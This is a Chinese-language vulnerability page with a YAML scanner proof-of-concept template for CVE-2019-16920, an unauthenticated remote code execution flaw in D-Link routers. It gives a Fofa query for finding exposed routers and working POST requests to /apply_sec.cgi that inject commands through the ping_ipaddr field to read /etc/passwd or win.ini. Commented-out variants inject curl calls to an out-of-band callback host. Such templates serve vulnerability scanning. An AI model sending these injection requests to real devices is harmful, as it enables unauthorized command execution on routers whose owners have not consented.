漏洞描述
Fofa app="D_Link-Router"
CVE-2019-16920: D-Link Unauthenticated remote code
PoC代码[已公开]
id: CVE-2019-16920
info:
name: D-Link Unauthenticated remote code
author: JingLing(https://hackfun.org/)
severity: critical
verified: false
description: |-
Fofa app="D_Link-Router"
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-16920
- https://mp.weixin.qq.com/s/8K5ucIKbcIUGJuGSkguoQg
tags: cve,cve2019,dlink,unauthenticated,rce
created: 2024/02/25
set:
oob: oob()
oobHTTP: oob.HTTP
passwd: urlencode("cat /etc/passwd")
winini: urlencode("type C:\\Windows\\win.ini")
rules:
# r0:
# request:
# method: POST
# path: /apply_sec.cgi
# body: html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acurl%20{{oobHTTP}}
# expression: oob(oob, oob.ProtocolHTTP, 3)
r0:
request:
method: POST
path: /apply_sec.cgi
body: html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
expression: response.status == 200
# r1:
# request:
# method: POST
# path: /apply_sec.cgi
# headers:
# Cookie: uid=1234123
# body: html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acurl%20{{oobHTTP}}
# expression: oob(oob, oob.ProtocolHTTP, 3)
r1:
request:
method: POST
path: /apply_sec.cgi
headers:
Cookie: uid=1234123
body: html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20/etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
r2:
request:
method: POST
path: /apply_sec.cgi
headers:
Cookie: uid=1234123
body: html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0atype%20C:\\Windows\\win.ini
expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
expression: r0() && (r1() || r2())
# expression: r0() && r1()